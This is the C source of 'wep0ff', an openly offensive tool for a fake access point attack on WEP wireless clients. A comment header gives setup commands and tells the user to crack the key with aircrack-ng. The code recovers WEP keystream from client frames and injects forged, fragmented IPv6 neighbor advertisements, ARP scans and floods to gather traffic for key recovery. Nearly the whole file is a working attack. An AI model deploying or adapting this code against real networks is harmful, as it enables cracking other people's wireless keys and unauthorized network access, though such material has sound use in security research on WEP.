/**
This tool can be used to mount fake access point attack against WEP-based wireless clients.
Using Atheros wireless cards in Linux.

For details check attached client-side-wep.pdf (Russian)

Written by Sergey Gordeychik <gordey (at) ptsecurity (dot) com>
Released under a BSD Licence

This code tested patched madwifi-old drivers with athraw support,
but also works with madwifi-ng. With madwifi-ng you need to create two virtual 
interfaces: one in master mode (for fake AP) and second in monitor mode (to listen on).


How to Use:

1. Setup fake AP with KARMA tools or iwconfig

iwpriv ath0 mode 2
iwconfig ath0 mode master essid foo enc 1122334455 channel 7
echo 1 > /proc/sys/dev/ath0/rawdev
echo 1 > /proc/sys/dev/ath0/rawdev_type
ifconfig ath0 up
ifconfig ath0raw up

2. Start this program (./wep0ff ath0raw 00:01:02:03:04:05)
3. Wait until client connect to fake access point
4. Launch airodump-ng to collect packets
5. Launch aircrack-ng to recover WEP key

How to Compile:
--gcc -o wep0ff wep0ff.c

This code based on following works and POCs:

thc-ipv6
http://www.thc.org/thc-ipv6/
aircrack-ng
http://www.aircrack-ng.org
wesside by sorbo 
http://www.cs.ucl.ac.uk/staff/a.bittau/frag-0.1.tgz
fakeaps by  by Evan Jones
http://evanjones.ca/software/fakeaps.html

Thanks for your excellent works.
Special thank to Alexander Anisimov. 

**/



#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>

#include <stdio.h>
#include <string.h>
#include <assert.h>
#include <stdlib.h>

#include <unistd.h>

#include <netinet/in.h>

#include <net/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>

#include <sys/time.h>
#include <time.h>

#define __packed __attribute__((__packed__))
#include  "net/ieee80211.h"
#include  "net/ieee80211_radiotap.h"
#include "aircrack/common.c"
#include "aircrack/crc.c"
#include "thc/thc-ipv6.h"


//
// Plaintext for different packet types
//
unsigned char arp_clear[]	= "\xAA\xAA\x03\x00\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x01";
unsigned char ip_clear[]	= "\xAA\xAA\x03\x00\x00\x00\x08\x00";
unsigned char ip6_clear[]	= "\xAA\xAA\x03\x00\x00\x00\x86\xdd";
unsigned char icmp6_clear[]	= "\xAA\xAA\x03\x00\x00\x00\x86\xdd\x60\x00\x00\x00\x00\x20\x3a\xff";

unsigned char ip6smac[]		= "\x00\x13\x02\x18\x63\xb1";
unsigned char ip6ndp[]		= "\x33\x33\x00\x00\x00\x01";
unsigned char apipa[]		= "\xa9\xfe";

unsigned char myip6mac[]	= "\x33\x33\xff\x18\x63\xb1";

unsigned char bssid[6];

//
// I don't cut off monitoring headers to make this code looks more serios :-)
//
unsigned char ctest_packet[] =
"\x44\x00\x00\x00\x90\x00\x00\x00\x61\x74\x68\x30\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x44\x00\x01\x00\x00\x00\x04\x00"
"\x9a\x51\x06\x00\x44\x00\x02\x00\x00\x00\x04\x00\xe3\xae\xd5\x46"
"\x44\x00\x03\x00\x00\x00\x04\x00\x07\x00\x00\x00\x44\x00\x04\x00"
"\x00\x00\x04\x00\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x44\x00\x06\x00\x00\x00\x04\x00\xe9\xff\xff\xff"
"\x44\x00\x07\x00\x00\x00\x04\x00\xa1\xff\xff\xff\x44\x00\x08\x00"
"\x00\x00\x04\x00\x16\x00\x00\x00\x44\x00\x09\x00\x00\x00\x04\x00"
"\x00\x00\x00\x00\x44\x00\x0a\x00\x00\x00\x04\x00\x55\x00\x00\x00"
"\x08\x01\xa2\x00\x00\x20\xa6\x54\x8e\xfd\x00\x16\x6f\x3c\x1c\xf9"
"\x33\x33\x00\x00\x00\x01\xe0\x01\x00\x00\x00\x00\xaa\xaa\x03\x00\x00\x00\x86\xdd"
"\x60\x00\x00\x00\x00\x09\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00"
"\x02\x13\x02\xff\xfe\x18\x63\xb1\xff\x02\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x01\x80\x00\x1f\x28\xfc\x30\x00\x02"
"\x00\x75\x47\xd9\xcd";

unsigned char ip6adv[] =
"\x44\x00\x00\x00\x90\x00\x00\x00\x61\x74\x68\x30\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x44\x00\x01\x00\x00\x00\x04\x00"
"\xab\xc3\x27\x00\x44\x00\x02\x00\x00\x00\x04\x00\xe8\xf3\xbe\x39"
"\x44\x00\x03\x00\x00\x00\x04\x00\x07\x00\x00\x00\x44\x00\x04\x00"
"\x00\x00\x04\x00\x45\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x44\x00\x06\x00\x00\x00\x04\x00\xe6\xff\xff\xff"
"\x44\x00\x07\x00\x00\x00\x04\x00\xa1\xff\xff\xff\x44\x00\x08\x00"
"\x00\x00\x04\x00\x16\x00\x00\x00\x44\x00\x09\x00\x00\x00\x04\x00"
"\x00\x00\x00\x00\x44\x00\x0a\x00\x00\x00\x04\x00\x6c\x00\x00\x00"
"\x08\x01\xa2\x00\x00\x20\xa6\x54\x8e\xfd\x00\x13\x02\x18\x63\xb1"
"\x00\x20\xa6\x54\x8e\xfd\xa0\x00\x00\x00\x00\x00\xaa\xaa\x03\x00\x00\x00\x86\xdd"
"\x60\x00\x00\x00\x00\x20\x3a\xff\xfe\x80\x00\x00\x00\x00\x00\x00"
"\x02\x13\x02\xff\xfe\x18\x63\xb1\xfe\x80\x00\x00\x00\x00\x00\x00"
"\x02\x20\xa6\xff\xfe\x54\x8e\xfd\x88\x00\xb0\x19\x60\x00\x00\x00"
"\xfe\x80\x00\x00\x00\x00\x00\x00\x02\x13\x02\xff\xfe\x18\x63\xb1"
"\x02\x01\x00\x13\x02\x18\x63\xb1\x3f\x57\x9b\x1c";

unsigned char arp_packet[] =
"\x44\x00\x00\x00\x90\x00\x00\x00\x61\x74\x68\x30\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x44\x00\x01\x00\x00\x00\x04\x00"
"\x81\x21\x00\x00\x44\x00\x02\x00\x00\x00\x04\x00\xb0\x70\x1a\x03"
"\x44\x00\x03\x00\x00\x00\x04\x00\x07\x00\x00\x00\x44\x00\x04\x00"
"\x00\x00\x04\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x44\x00\x06\x00\x00\x00\x04\x00\xaf\xff\xff\xff"
"\x44\x00\x07\x00\x00\x00\x04\x00\xa1\xff\xff\xff\x44\x00\x08\x00"
"\x00\x00\x04\x00\x30\x00\x00\x00\x44\x00\x09\x00\x00\x00\x04\x00"
"\x00\x00\x00\x00\x44\x00\x0a\x00\x00\x00\x04\x00\x40\x00\x00\x00"
"\x08\x01\x2c\x00\xff\xff\xff\xff\xff\xff\x00\x11\x22\x33\x44\x55"
"\xff\xff\xff\xff\xff\xff\x90\x00\x00\x00\x00\x00\xaa\xaa\x03\x00\x00\x00\x08\x06"
"\x00\x01\x08\x00\x06\x04\x00\x01\x00\x11\x22\x33\x44\x55\xa9\xfe"
"\x00\x01\x00\x00\x00\x00\x00\x00\xc0\xa8\x01\x02\xcb\xde\x93\xd6"
"\x00\xd0";


int
calculate_checksum (
	unsigned char *data,
	int data_len
	)
{

	int i = 0, checksum = 0;

	while (i < data_len) {
		if (i++ % 2 == 0) checksum += *data++;
		else checksum += *data++ << 8;
	}

	checksum = (checksum & 0xffff) + (checksum >> 16);
	checksum = htons(~checksum);

	return checksum;
}


int
checksum_pseudo_header (
	unsigned char *src,
	unsigned char *dst,
	unsigned char type,
	unsigned char *data,
	int length
	)
{
	unsigned char *ptr;
	int checksum;

	ptr = (unsigned char *) malloc(40 + length);
	if (ptr == NULL)
		return -1;

	memset(ptr, 0, 40 + length);
	memcpy(&ptr[0], src, 16);
	memcpy(&ptr[16], dst, 16);
	ptr[34] = length / 256;
	ptr[35] = length % 256;
	ptr[39] = type;
	if (data != NULL && length > 0)
		memcpy(&ptr[40], data, length);

	checksum = calculate_checksum(ptr, 40 + length);

	if (type == NXT_UDP && checksum == 0)
		checksum=65535;

	free(ptr);
	return checksum;
}


int
openSocket (const char device[IFNAMSIZ])
{
	struct ifreq ifr;
	struct sockaddr_ll ll;
	const int protocol = ETH_P_ALL;
	int sock = -1;

	assert(sizeof(ifr.ifr_name) == IFNAMSIZ);

	sock = socket(PF_PACKET, SOCK_RAW, htons(protocol));
	if (sock < 0) {
		perror("socket failed (do you have root priviledges?)");
		return -1;
	}

	memset(&ifr, 0, sizeof( ifr ));
	strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
	if (ioctl(sock, SIOCGIFINDEX, &ifr) < 0) {
		perror("ioctl[SIOCGIFINDEX]");
		close(sock);
		return -1;
	}

	memset(&ll, 0, sizeof(ll));
	ll.sll_family = AF_PACKET;
	ll.sll_ifindex = ifr.ifr_ifindex;
	ll.sll_protocol = htons(protocol);
	if (bind(sock, (struct sockaddr *) &ll, sizeof(ll)) < 0) {
		perror("bind[AF_PACKET]");
		close(sock);
		return -1;
	}

	return sock;
}

void
packet_hexdump (
	const uint8_t *data,
	size_t size
	)
{
	size_t i;

	printf("%02x:", data[0]);
	for (i = 1; i < size; i++) {
		printf("%02x:", data[i]);
		if ((i & 0xf)  == 0xf) {
			// Add a carrage return every 16 bytes
			printf( "\n" );
		}
	}
	printf("\n");
}

void
transmitPacket (
	int rawSocket,
	uint8_t *packet,
	size_t size
	)
{
	// Send the packet
	ssize_t bytes = write(rawSocket, packet, size);
	assert(bytes == (ssize_t) size);
}

void
transmitfPacket (
	int rawSocket,
	uint8_t *packet,
	size_t size,
	uint8_t *prga,
	size_t prgasize,
	uint8_t *iv)
{

	unsigned char header[172];
	unsigned char fpacket[4096];
	unsigned long *pcrc;
	int offset = 0xac;
	int fragn = 0;
	unsigned long crc;

	// Transmit packet with 802.11 fragmentation

	memcpy(header, packet, 172);
	while (offset<size) {
		if ((offset + prgasize - 4) >= size)
			prgasize = (size--) - offset + 3;

		memcpy(fpacket, header, 172);
		fpacket[0xa6] |= fragn++;
		memcpy(&fpacket[172], &packet[offset], prgasize - 4);
		memcpy(&fpacket[0xa8], iv, 3);
		offset = offset + prgasize - 4;

		if (offset < size)
			fpacket[0x91] |= 0x04;

		add_crc32(&fpacket[172], prgasize - 4);

		for (crc = 0; crc < prgasize; crc++) {
			fpacket[172+crc] =  prga[crc] ^ fpacket[172+crc];
		}

		transmitPacket(rawSocket, fpacket, 172 + prgasize);
	}

}



void
help (void)
{
	printf( "./wep0ff <raw interface> <bssid> [don't_use_ipv6]\n\nexample: wep0ff ath0raw 00:01:02:03:04:05\n" );
}

void
br (void)
{
	printf( "\n=============================\n" );
}

void
differenceTimeval (
	const struct timeval *first,
	struct timeval *second
	)
{
	assert(first != NULL);
	assert(second != NULL);

	second->tv_sec = second->tv_sec - first->tv_sec;
	second->tv_usec = second->tv_usec-first->tv_usec;

	// If underflow occured, borrow a second from the higher field
	if (second->tv_usec < 0) {
		second->tv_sec -= 1;
		second->tv_usec += 1000000;

		// If this assertion fails, the initial timevals had invalid values
		assert(0 <= second->tv_usec && second->tv_usec < 1000000);
	}
}

void
ipv6check (uint8_t *packetBuffer)
{
	// Calculate IPv6 checksum
	unsigned int csum = 0;
	packetBuffer[0xde] = 0;
	packetBuffer[0xdf] = 0;

	csum = checksum_pseudo_header(&packetBuffer[0xbc], &packetBuffer[0xcc], NXT_ICMP6, &packetBuffer[0xdc], 32);
  	packetBuffer[0xde] = csum / 256;
  	packetBuffer[0xdf] = csum % 256;
}

int
ipv6ping (uint8_t *packetBuffer)
{
	// Prepare IPv6 broadcast ping
	int bytes = sizeof(ctest_packet);

	memcpy(packetBuffer, ctest_packet, bytes);
	memcpy(&packetBuffer[0x94], &ip6ndp,  6);
	memcpy(&packetBuffer[0x9a], &bssid,  6);
	memcpy(&packetBuffer[0xa0], &ip6smac,  6);

	packetBuffer[0x91] = 2;
	packetBuffer[0x91] |= 0x40;

	return bytes;
}

int
main (int argc, char *argv[])
{
	const char* device = argv[1];
	const char* cbssid = argv[2];
	int state = 0;

	unsigned long i, prgasize, ip6ping = 0;
	unsigned char cleartext[16];
	unsigned char iv[3];
	unsigned char stamac[6];
	unsigned char staip3 = 0;
	unsigned char staip4 = 0;
	uint8_t packetBuffer[4096];
	ssize_t bytes;

	if (argc < 3) {
		help();
		return 1;
	}

	if (argc == 4) ip6ping = 1;

	struct timeval lastTime;
	int code = gettimeofday(&lastTime, NULL);
	assert(code == 0);
	int isMac = getmac(cbssid, 1, bssid);
	packet_hexdump(bssid, 6);

	if (isMac) {
		help();
		return 1;
	}

	// Open the raw device
	int rawSocket = openSocket(device);
	if (rawSocket < 0) {
		fprintf(stderr, "error opening socket\n");
		return 1;
	}

	printf("Waiting for the packet\n");

	fd_set readfds;
	FD_ZERO( &readfds );
	FD_SET( rawSocket, &readfds );

	struct timeval tv;
	tv.tv_sec = 0;
	tv.tv_usec = 1;

	for (;;) {

		int numFds = 1;
		ssize_t rbytes = 1;
		ssize_t bytes;

		while (numFds > 0 && rbytes > 0) {
			// Read packets from buffer
			FD_ZERO(&readfds);
			FD_SET(rawSocket, &readfds);

			numFds = select(rawSocket+1, &readfds, NULL, NULL, &tv);
			assert(numFds >= 0);
			if (numFds > 0) {
				bytes = read(rawSocket, packetBuffer, sizeof(packetBuffer));
				if (bytes < 0) {
					perror("read failed");
					return 1;
				}
				rbytes = bytes;
			}

			if (numFds == 1 && state == 0) {

				struct ieee80211_frame *frame = (struct ieee80211_frame*)(&packetBuffer[0x90]);

				// Check for WEPed data frame from STA
				if ( (frame->i_fc[0] & 0x08 ) == 0x08 &&
				     (frame->i_fc[1] & 0x41 ) == 0x41 &&
 				      memcmp(frame->i_addr1, bssid, 6) == 0 ) {

					// Check LLC type and recover PRGA
					printf("Got packet\nLLC type: ");
					if (memcmp (frame->i_addr3, "\x33\x33", 2 ) == 0) {
						printf("IPv6\n");
						memcpy(cleartext, ip6_clear, 8);
						prgasize = 8;
					}
					else if (memcmp(frame->i_addr3, "\xFF\xFF", 2) == 0 && bytes == 216) {
						printf("ARP\n");
						memcpy(cleartext, arp_clear, 16);
						prgasize = 16;
					}
					else {
						printf("IP\n");
						memcpy(cleartext, ip_clear, 8);
						prgasize = 8;
					}

					memcpy(iv, &packetBuffer[0xA8], 3);
					memcpy(stamac, &packetBuffer[0x9A], 6);

					state = 1 + 89*ip6ping;

					for (i = 0; i < prgasize; i++) {
						cleartext[i] =  (packetBuffer[0xAc] ? (cleartext[i] ^ packetBuffer[0xAc+i]) : cleartext[i]);
					}

					printf("STA: ");
					packet_hexdump(stamac, 6);
					printf("IV: ");
					packet_hexdump(iv, 3);
					printf("PRGA: ");
					packet_hexdump(cleartext, prgasize);
					br();
				}

			} // if (numFds == 1 && state == 0)

		
			if (bytes > 0) {

				// Check for ARP response to my MAC-address
				if ( memcmp(&packetBuffer[0xa2], apipa, 2) == 0 &&
				     state == 90 &&
				     packetBuffer[0x91] == 0x41 ) {

					staip3 = packetBuffer[0xa4];
					staip4 = packetBuffer[0xa5];
					printf("Got ARP Respose 169.254.%d.%d\n", staip3, staip4);
					printf("Starting ARP flood\n");
					state = 200;
				}
				if ( memcmp(&packetBuffer[0xa0], myip6mac, 6) == 0 ) {
					br();
					printf("Got IPv6 neighbor solicitation!\n");
					// Need >> 8 bytes of prga to inject IPv6 NDP
					memcpy(cleartext, icmp6_clear, 16);
					prgasize = 16;
					memcpy(iv, &packetBuffer[0xA8], 3); 
					for (i = 0; i < prgasize; i++) {
						cleartext[i] =  ( packetBuffer[0xac] ? (cleartext[i] ^ packetBuffer[0xac+i]) : cleartext[i]);
					}

					bytes = sizeof(ip6adv);
					memcpy(packetBuffer, ip6adv, bytes);
					memcpy(&packetBuffer[0x94], &stamac,  6);
					memcpy(&packetBuffer[0x9a], &bssid,  6);
					memcpy(&packetBuffer[0xa0], &ip6smac,  6);
					memcpy(&packetBuffer[0xd4], &stamac,  3);
					memcpy(&packetBuffer[0xd9], &stamac[3], 3);
					packetBuffer[0x91] = 2;
					packetBuffer[0x91] |= 0x40;
					ipv6check(packetBuffer);

					printf("Trying ipv6 neighbor advertisement\n");
					transmitfPacket( rawSocket, packetBuffer, bytes, cleartext, prgasize, iv);

					// Strange xor 2 in Linux IPv6
					packetBuffer[0xd4] ^= 2;
					ipv6check(packetBuffer);
					transmitfPacket(rawSocket, packetBuffer, bytes, cleartext, prgasize, iv);
					printf("Starting ipv6 flood\n");
					state = 100;
				}
			}
		}

		if (state == 100) {
			// IPv6 flood
			bytes = ipv6ping(packetBuffer);
			packetBuffer[0xa7] = (i++ % 256);
			transmitfPacket(rawSocket, packetBuffer, bytes, cleartext, prgasize, iv);
			usleep(1);
		}

		if (state == 200) {
			// ARP flood
			int bytes = sizeof(arp_packet);

			memcpy(packetBuffer, arp_packet, bytes);
			memcpy(&packetBuffer[0x9a], &bssid, 6);
			memcpy(&packetBuffer[0xa0], &ip6smac, 2);
			memcpy(&packetBuffer[0xa2], &apipa, 2);
			packetBuffer[0xa4] = staip3;
			packetBuffer[0xa5] = staip4;
			memcpy(&packetBuffer[0xbc], &packetBuffer[0xa0],  6);
			memcpy(&packetBuffer[0xcc], &packetBuffer[0xa2],  4);
			packetBuffer[0x91] = 0x42;
			packetBuffer[0xa7] = (i++ % 256);
			transmitfPacket(rawSocket, packetBuffer, bytes, cleartext, prgasize, iv);
			usleep(1);
		}
		
		if (state == 90) {
			// ARP-based IP-address bruteforce
			struct timeval now;
			int code = gettimeofday(&now, NULL);
			differenceTimeval(&lastTime, &now);

			if (staip4 == 0) {
				staip4++;
				printf("Trying APR scan for 169.254.%d.0\n", staip3++);
			}

			int bytes = sizeof(arp_packet);

			memcpy(packetBuffer, arp_packet, bytes);
			memcpy(&packetBuffer[0x9a], &bssid, 6);
			memcpy(&packetBuffer[0xa0], &ip6smac, 2);
			memcpy(&packetBuffer[0xa2], &apipa, 2); 

			packetBuffer[0xa4] = staip3;
			packetBuffer[0xa5] = staip4++;

			memcpy(&packetBuffer[0xbc], &packetBuffer[0xa0], 6);
			memcpy(&packetBuffer[0xcc], &packetBuffer[0xa2], 4);

			packetBuffer[0x91] = 0x42;
			transmitfPacket(rawSocket, packetBuffer, bytes, cleartext, prgasize, iv);
			code = gettimeofday(&lastTime, NULL);
		}

		if (state > 0 && state < 90) {

			struct timeval now;
			int code = gettimeofday(&now, NULL);
			differenceTimeval(&lastTime, &now);

			if (now.tv_sec > 0) {
				bytes = ipv6ping(packetBuffer);
				packetBuffer[0xa7] = (i++ % 256);
				transmitfPacket(rawSocket, packetBuffer, bytes, cleartext, prgasize, iv);
				printf("Trying ipv6 ping\n");
				code = gettimeofday(&lastTime, NULL );
				assert(code == 0);
				state++;
			}
	
		}
	}					

	close(rawSocket);

}
